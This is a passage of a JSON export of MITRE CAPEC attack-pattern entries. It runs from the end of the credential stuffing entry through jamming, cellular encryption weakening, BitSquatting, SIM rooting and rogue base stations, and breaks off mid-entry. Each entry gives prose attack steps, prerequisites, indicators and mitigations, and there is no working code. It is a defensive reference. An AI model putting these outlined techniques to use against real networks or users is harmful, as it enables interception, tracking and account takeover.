interface."},{"Step":"3","Phase":"Exploit","Description":"[Impersonate] An adversary can use successful experiments or authentications to impersonate an authorized user or system or to laterally move within a system or application"},{"Step":"4","Phase":"Exploit","Description":"[Spoofing] Malicious data can be injected into the target system or into a victim user\'s system by an adversary. The adversary can also pose as a legitimate user to perform social engineering attacks."},{"Step":"5","Phase":"Exploit","Description":"[Data Exfiltration] The adversary can obtain sensitive data contained within the system or application."}]},"Prerequisites":{"Prerequisite":["The system/application uses one factor password based authentication, SSO, and/or cloud-based authentication.","The system/application does not have a sound password policy that is being enforced.","The system/application does not implement an effective password throttling mechanism.","The adversary possesses a list of known user accounts and corresponding passwords that may exist on the target."]},"Skills_Required":{"Skill":["A Credential Stuffing attack is very straightforward.",{"Level":"Low"}]},"Resources_Required":{"Resource":["A machine with sufficient resources for the job (e.g. CPU, RAM, HD).","A known list of username/password combinations.","A custom script that leverages the credential list to launch the attack."]},"Indicators":{"Indicator":["Many invalid login attempts are coming from the same machine (same IP address) or for multiple user accounts within short succession.","The login attempts use passwords that have been used previously by the user account in question.","Login attempts are originating from IP addresses or locations that are inconsistent with the user\'s normal IP addresses or locations."]},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authentication"],"Impact":"Gain Privileges"},{"Scope":["Confidentiality","Authorization"],"Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":["Leverage multi-factor authentication for all authentication services and prior to granting an entity access to the domain network.","Create a strong password policy and ensure that your system enforces this policy.","Ensure users are not reusing username/password combinations for multiple systems, applications, or services.","Do not reuse local administrator account credentials across systems.","Deny remote use of local admin credentials to log into domain systems.","Do not allow accounts to be a local administrator on more than one system.","Implement an intelligent password throttling mechanism. Care must be taken to assure that these mechanisms do not excessively enable account lockout attacks such as CAPEC-2.","Monitor system and domain logs for abnormal credential access."]},"Example_Instances":{"Example":["A user leverages the password \\"Password123\\" for a handful of application logins. An adversary obtains a victim\'s username/password combination from a breach of a social media application and executes a Credential Stuffing attack against multiple banking and credit card applications. Since the user leverages the same credentials for their bank account login, the adversary successfully authenticates to the user\'s bank account and transfer money to an offshore account.","In October 2014 J.P. Morgan\'s Corporate Challenge website was breached, resulting in adversaries obtaining multiple username/password pairs. A Credential Stuffing attack was then executed against J.P. Morgan Chase, which resulted in over 76 million households having their accounts compromised."]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"522"},{"CWE_ID":"307"},{"CWE_ID":"308"},{"CWE_ID":"309"},{"CWE_ID":"262"},{"CWE_ID":"263"},{"CWE_ID":"654"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1110.004","Entry_Name":"Brute Force:Credential Stuffing"},{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Credential stuffing"}]},"References":{"Reference":[{"External_Reference_ID":"REF-567"},{"External_Reference_ID":"REF-568"},{"External_Reference_ID":"REF-569"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2020-07-30"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"}}},"601":{"ID":"601","Name":"Jamming","Abstraction":"Standard","Status":"Draft","Description":"An adversary uses radio noise or signals in an attempt to disrupt communications. By intentionally overwhelming system resources with illegitimate traffic, service is denied to the legitimate traffic of authorized users.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"607","Exclude_Related":[{"Exclude_ID":"513"},{"Exclude_ID":"514"},{"Exclude_ID":"515"},{"Exclude_ID":"403"}]}},"Consequences":{"Consequence":{"Scope":"Availability","Impact":"Other","Note":"The jamming of equipment denies the availability of functioning communications services."}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Description Summary, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"603":{"ID":"603","Name":"Blockage","Abstraction":"Standard","Status":"Draft","Description":"An adversary blocks the delivery of an important system resource causing the system to fail or stop working.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"607","Exclude_Related":[{"Exclude_ID":"514"},{"Exclude_ID":"515"},{"Exclude_ID":"403"}]}},"Prerequisites":{"Prerequisite":"This attack pattern requires knowledge of where important system resources are logically located as well as how they operate."},"Consequences":{"Consequence":{"Scope":"Availability","Impact":"Other","Note":"Blocking a resource from functional operation denies its availability to authorized users."}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"604":{"ID":"604","Name":"Wi-Fi Jamming","Abstraction":"Detailed","Status":"Draft","Description":"In this attack scenario, the attacker actively transmits on the Wi-Fi channel to prevent users from transmitting or receiving data from the targeted Wi-Fi network. There are several known techniques to perform this attack \u2013 for example: the attacker may flood the Wi-Fi access point (e.g. the retransmission device) with deauthentication frames. Another method is to transmit high levels of noise on the RF band used by the Wi-Fi network.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"601"}},"Prerequisites":{"Prerequisite":["Lack of anti-jam features in 802.11","Lack of authentication on deauthentication/disassociation packets on 802.11-based networks"]},"Skills_Required":{"Skill":["This attack can be performed by low capability attackers with freely available tools. Commercial tools are also available that can target select networks or all WiFi networks within a range of several miles.",{"Level":"Low"}]},"Consequences":{"Consequence":[{"Scope":"Availability","Impact":"Other","Note":"A successful attack will deny the availability of the Wi-fi network to authorized users."},{"Scope":"Availability","Impact":"Resource Consumption","Note":"The attacker\'s goal is to prevent users from accessing the wireless network. Denying connectivity to the wireless network prevents the user from being able to transmit or receive any data, which also prevents VOIP calls, however this attack poses no threat to data confidentiality."}]},"Mitigations":{"Mitigation":"Countermeasures have been proposed for both disassociation flooding and RF jamming, however these countermeasures are not standardized and would need to be supported on both the retransmission device and the handset in order to be effective. Commercial products are not currently available that support jamming countermeasures for Wi-Fi."},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Motivation-Consequences, Related_Vulnerabilities, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences"}]}},"605":{"ID":"605","Name":"Cellular Jamming","Abstraction":"Detailed","Status":"Draft","Description":"In this attack scenario, the attacker actively transmits signals to overpower and disrupt the communication between a cellular user device and a cell tower. Several existing techniques are known in the open literature for this attack for 2G, 3G, and 4G LTE cellular technology. For example, some attacks target cell towers by overwhelming them with false status messages, while others introduce high levels of noise on signaling channels.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"601"}},"Prerequisites":{"Prerequisite":"Lack of anti-jam features in cellular technology (2G, 3G, 4G, LTE)"},"Skills_Required":{"Skill":["This attack can be performed by low capability attackers with commercially available tools.",{"Level":"Low"}]},"Consequences":{"Consequence":{"Scope":"Availability","Impact":"Resource Consumption","Note":"The attacker\'s goal is to prevent users from accessing the cellular network. Denying connectivity to the cellular network prevents the user from being able to transmit or receive any data, which also prevents VOIP calls, however this attack poses no threat to data confidentiality."}},"Mitigations":{"Mitigation":"Mitigating this attack requires countermeasures employed on both the retransmission device as well as on the cell tower. Therefore, any system that relies on existing commercial cell towards will likely be vulnerable to this attack. By using a private cellular LTE network (i.e., a custom cell tower), jamming countermeasures could be developed and employed."},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences"}}},"606":{"ID":"606","Name":"Weakening of Cellular Encryption","Abstraction":"Detailed","Status":"Draft","Description":"An attacker, with control of a Cellular Rogue Base Station or through cooperation with a Malicious Mobile Network Operator can force the mobile device (e.g., the retransmission device) to use no encryption (A5/0 mode) or to use easily breakable encryption (A5/1 or A5/2 mode).","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"620"}},"Prerequisites":{"Prerequisite":"Cellular devices that allow negotiating security modes to facilitate backwards compatibility and roaming on legacy networks."},"Skills_Required":{"Skill":["Adversaries can purchase and implement rogue BTS stations at a cost effective rate, and can push a mobile device to downgrade to a non-secure cellular protocol like 2G over GSM or CDMA.",{"Level":"Medium"}]},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Other","Note":"Tracking, Network Reconnaissance"}},"Mitigations":{"Mitigation":["Use of hardened baseband firmware on retransmission device to detect and prevent the use of weak cellular encryption.","Monitor cellular RF interface to detect the usage of weaker-than-expected cellular encryption."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"757"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences"}}},"607":{"ID":"607","Name":"Obstruction","Abstraction":"Meta","Status":"Draft","Description":"An attacker obstructs the interactions between system components. By interrupting or disabling these interactions, an adversary can often force the system into a degraded state or even to fail.","Consequences":{"Consequence":{"Scope":"Availability","Impact":"Resource Consumption"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Description Summary"}}},"608":{"ID":"608","Name":"Cryptanalysis of Cellular Encryption","Abstraction":"Detailed","Status":"Draft","Description":"The use of cryptanalytic techniques to derive cryptographic keys or otherwise effectively defeat cellular encryption to reveal traffic content. Some cellular encryption algorithms such as A5/1 and A5/2 (specified for GSM use) are known to be vulnerable to such attacks and commercial tools are available to execute these attacks and decrypt mobile phone conversations in real-time. Newer encryption algorithms in use by UMTS and LTE are stronger and currently believed to be less vulnerable to these types of attacks. Note, however, that an attacker with a Cellular Rogue Base Station can force the use of weak cellular encryption even by newer mobile devices.","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"97","Exclude_Related":{"Exclude_ID":"515"}}},"Prerequisites":{"Prerequisite":"None"},"Skills_Required":{"Skill":["Adversaries can rent commercial supercomputer time globally to conduct cryptanalysis on encrypted data captured from mobile devices. Foreign governments have their own cryptanalysis technology and capabilities. Commercial cellular standards for encryption (GSM and CDMA) are also subject to adversary cryptanalysis.",{"Level":"Medium"}]},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Other","Note":"Reveals IMSI and IMEI for tracking of retransmission device and enables further follow-on attacks by revealing black network control messages. (e.g., revealing IP addresses of enterprise servers for VOIP connectivity)"}},"Mitigations":{"Mitigation":["Use of hardened baseband firmware on retransmission device to detect and prevent the use of weak cellular encryption.","Monitor cellular RF interface to detect the usage of weaker-than-expected cellular encryption."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"327"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"609":{"ID":"609","Name":"Cellular Traffic Intercept","Abstraction":"Detailed","Status":"Draft","Description":"Cellular traffic for voice and data from mobile devices and retransmission devices can be intercepted via numerous methods. Malicious actors can deploy their own cellular tower equipment and intercept cellular traffic surreptitiously. Additionally, government agencies of adversaries and malicious actors can intercept cellular traffic via the telecommunications backbone over which mobile traffic is transmitted.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"157","Exclude_Related":{"Exclude_ID":"513"}}},"Prerequisites":{"Prerequisite":"None"},"Skills_Required":{"Skill":["Adversaries can purchase hardware and software solutions, or create their own solutions, to capture/intercept cellular radio traffic. The cost of a basic Base Transceiver Station (BTS) to broadcast to local mobile cellular radios in mobile devices has dropped to very affordable costs. The ability of commercial cellular providers to monitor for \\"rogue\\" BTS stations is poor in many areas and it is assumed that \\"rogue\\" BTS stations exist in urban areas.",{"Level":"Medium"}]},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data","Note":"Capture all cellular and RF traffic from mobile and retransmission devices. Move bulk traffic capture to storage area for cryptanalysis of encrypted traffic, and telemetry analysis of non-encrypted data. (packet headers, cellular power data, signal strength, etc.)"}},"Mitigations":{"Mitigation":"Encryption of all data packets emanating from the smartphone to a retransmission device via two encrypted tunnels with Suite B cryptography, all the way to the VPN gateway at the datacenter."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"311"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns, Skills_Required"}]}},"610":{"ID":"610","Name":"Cellular Data Injection","Abstraction":"Standard","Status":"Stable","Description":"Adversaries inject data into mobile technology traffic (data flows or signaling data) to disrupt communications or conduct additional surveillance operations.","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"240"}},"Prerequisites":{"Prerequisite":"None"},"Skills_Required":{"Skill":["Often achieved by nation states in conjunction with commercial cellular providers to conduct cellular traffic intercept and possible traffic injection.",{"Level":"High"}]},"Consequences":{"Consequence":[{"Scope":"Availability","Impact":"Resource Consumption","Note":"Attackers can disrupt or deny mobile technology communications and operations."},{"Scope":"Availability","Impact":"Modify Data","Note":"Attackers can inject false data into data or signaling system data flows of communications and operations, or re-route data flows or signaling data for the purpose of further data intercept and capture."}]},"Mitigations":{"Mitigation":"Commercial defensive technology to detect and alert to any attempts to modify mobile technology data flows or to inject new data into existing data flows and signaling data."},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Motivation-Consequences"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction"}]}},"611":{"ID":"611","Name":"BitSquatting","Abstraction":"Detailed","Status":"Draft","Description":"An adversary registers a domain name one bit different than a trusted domain. A BitSquatting attack leverages random errors in memory to direct Internet traffic to adversary-controlled destinations. BitSquatting requires no exploitation or complicated reverse engineering, and is operating system and architecture agnostic. Experimental observations show that BitSquatting popular websites could redirect non-trivial amounts of Internet traffic to a malicious entity.","Likelihood_Of_Attack":"Low","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"616","Exclude_Related":[{"Exclude_ID":"512"},{"Exclude_ID":"513"},{"Exclude_ID":"515"}]},{"Nature":"CanPrecede","CAPEC_ID":"89"},{"Nature":"CanPrecede","CAPEC_ID":"543"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine target website] The adversary first determines which website to impersonate, generally one that is trusted and receives a consistent amount of traffic.","Technique":"Research popular or high traffic websites."},{"Step":"2","Phase":"Experiment","Description":"[Impersonate trusted domain] In order to impersonate the trusted domain, the adversary needs to register the BitSquatted URL.","Technique":"Register the BitSquatted domain."},{"Step":"3","Phase":"Exploit","Description":"[Wait for a user to visit the domain] Finally, the adversary simply waits for a user to be unintentionally directed to the BitSquatted domain.","Technique":"Simply wait for an error in memory to occur, redirecting the user to the malicious domain."}]},"Prerequisites":{"Prerequisite":"An adversary requires knowledge of popular or high traffic domains, that could be used to deceive potential targets."},"Skills_Required":{"Skill":["Adversaries must be able to register DNS hostnames/URL\u2019s.",{"Level":"Low"}]},"Consequences":{"Consequence":{"Scope":"Other","Impact":"Other","Note":"Depending on the intention of the adversary, a successful BitSquatting attack can be leveraged to execute more complex attacks such as cross-site scripting or stealing account credentials."}},"Mitigations":{"Mitigation":["Authenticate all servers and perform redundant checks when using DNS hostnames.","When possible, use error-correcting (ECC) memory in local devices as non-ECC memory is significantly more vulnerable to faults."]},"References":{"Reference":{"External_Reference_ID":"REF-485"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Architectural_Paradigms, Attack_Motivation-Consequences, Attack_Phases, Attack_Prerequisites, Description, Description Summary, Methods_of_Attack, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"612":{"ID":"612","Name":"WiFi MAC Address Tracking","Abstraction":"Detailed","Status":"Draft","Description":"In this attack scenario, the attacker passively listens for WiFi messages and logs the associated Media Access Control (MAC) addresses. These addresses are intended to be unique to each wireless device (although they can be configured and changed by software). Once the attacker is able to associate a MAC address with a particular user or set of users (for example, when attending a public event), the attacker can then scan for that MAC address to track that user in the future.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"292"}},"Prerequisites":{"Prerequisite":"None"},"Skills_Required":{"Skill":["Open source and commercial software tools are available and several commercial advertising companies routinely set up tools to collect and monitor MAC addresses.",{"Level":"Low"}]},"Mitigations":{"Mitigation":["Automatic randomization of WiFi MAC addresses","Frequent changing of handset and retransmission device"]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"201"},{"CWE_ID":"300"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"}]}},"613":{"ID":"613","Name":"WiFi SSID Tracking","Abstraction":"Detailed","Status":"Draft","Description":"In this attack scenario, the attacker passively listens for WiFi management frame messages containing the Service Set Identifier (SSID) for the WiFi network. These messages are frequently transmitted by WiFi access points (e.g., the retransmission device) as well as by clients that are accessing the network (e.g., the handset/mobile device). Once the attacker is able to associate an SSID with a particular user or set of users (for example, when attending a public event), the attacker can then scan for this SSID to track that user in the future.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"292"}},"Prerequisites":{"Prerequisite":"None"},"Skills_Required":{"Skill":["Open source and commercial software tools are available and open databases of known WiFi SSID addresses are available online.",{"Level":"Low"}]},"Mitigations":{"Mitigation":["Do not enable the feature of \\"Hidden SSIDs\\" (also known as \\"Network Cloaking\\") \u2013 this option disables the usual broadcasting of the SSID by the access point, but forces the mobile handset to send requests on all supported radio channels which contains the SSID. The result is that tracking of the mobile device becomes easier since it is transmitting the SSID more frequently.","Frequently change the SSID to new and unrelated values"]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"201"},{"CWE_ID":"300"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Mitigations"}]}},"614":{"ID":"614","Name":"Rooting SIM Cards","Abstraction":"Detailed","Status":"Draft","Description":"SIM cards are the de facto trust anchor of mobile devices worldwide. The cards protect the mobile identity of subscribers, associate devices with phone numbers, and increasingly store payment credentials, for example in NFC-enabled phones with mobile wallets. This attack leverages over-the-air (OTA) updates deployed via cryptographically-secured SMS messages to deliver executable code to the SIM. By cracking the DES key, an attacker can send properly signed binary SMS messages to a device, which are treated as Java applets and are executed on the SIM. These applets are allowed to send SMS, change voicemail numbers, and query the phone location, among many other predefined functions. These capabilities alone provide plenty of potential for abuse.","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"186","Exclude_Related":{"Exclude_ID":"403"}}},"Prerequisites":{"Prerequisite":"A SIM card that relies on the DES cipher."},"Skills_Required":{"Skill":["This is a sophisticated attack, but detailed techniques are published in open literature.",{"Level":"Medium"}]},"Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":"Execute Unauthorized Commands"}},"Mitigations":{"Mitigation":"Upgrade the SIM card to use the state-of-the-art AES or the somewhat outdated 3DES algorithm for OTA."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"327"}},"References":{"Reference":{"External_Reference_ID":"REF-486"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"}],"Previous_Entry_Name":["Rooting SIM CardS",{"Date":"2017-01-09"}]}},"615":{"ID":"615","Name":"Evil Twin Wi-Fi Attack","Abstraction":"Detailed","Status":"Draft","Description":"Adversaries install Wi-Fi equipment that acts as a legitimate Wi-Fi network access point. When a device connects to this access point, Wi-Fi data traffic is intercepted, captured, and analyzed. This also allows the adversary to use \\"adversary-in-the-middle\\" (CAPEC-94) for all communications.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"616","Exclude_Related":{"Exclude_ID":"403"}}},"Prerequisites":{"Prerequisite":"None"},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data","Note":"Intercept and control Wi-Fi data communications to/from mobile device."}},"Mitigations":{"Mitigation":"Commercial defensive technology that monitors for rogue Wi-Fi access points, adversary-in-the-middle attacks, and anomalous activity with the mobile device baseband radios."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"300"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Description, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Description, Mitigations"}]}},"616":{"ID":"616","Name":"Establish Rogue Location","Abstraction":"Standard","Status":"Stable","Description":"An adversary provides a malicious version of a resource at a location that is similar to the expected location of a legitimate resource. After establishing the rogue location, the adversary waits for a victim to visit the location and access the malicious resource.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"154"}},"Prerequisites":{"Prerequisite":"A resource is expected to available to the user."},"Skills_Required":{"Skill":["Adversaries can often purchase low-cost technology to implement rogue access points.",{"Level":"Low"}]},"Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":"Other","Note":"Successful attacks of this nature can result in a wide variety of consequences and negatively impact confidentiality and integrity based on the adversary\'s subsequent actions."}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Related_Weaknesses, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"}],"Previous_Entry_Name":["Patiently Waiting at Incorrect Location",{"Date":"2017-05-01"}]}},"617":{"ID":"617","Name":"Cellular Rogue Base Station","Abstraction":"Detailed","Status":"Draft","Description":"In this attack scenario, the attacker imitates a cellular base station with their own \\"rogue\\" base station equipment. Since cellular devices connect to whatever station has the strongest signal, the attacker can easily convince a targeted cellular device (e.g. the retransmission device) to talk to the rogue base station.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"616","Exclude_Related":[{"Exclude_ID":"403"},{"Exclude_ID":"513"}]}},"Prerequisites":{"Prerequisite":"None"},"Skills_Required":{"Skill":["This technique has been demonstrated by amateur hackers and commercial tools and open source projects are available to automate the attack.",{"Level":"Low"}]},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data","Note":"Intercept and control cellular data communications to/from mobile device."}},"Mitigations":{"Mitigation":"Passively monitor cellular network connection for real-time threat detection and logging for manual review."},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Description, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description"}]}},"618":{"ID":"618","Name":"Cellular Broadcast Message Request","Abstraction":"Detailed","Status":"Draft","Description":"In this attack scenario, the attacker uses knowledge of the target\u2019s mobile phone number (i.e., the number associated with the SIM used in the retransmission device) to cause the cellular 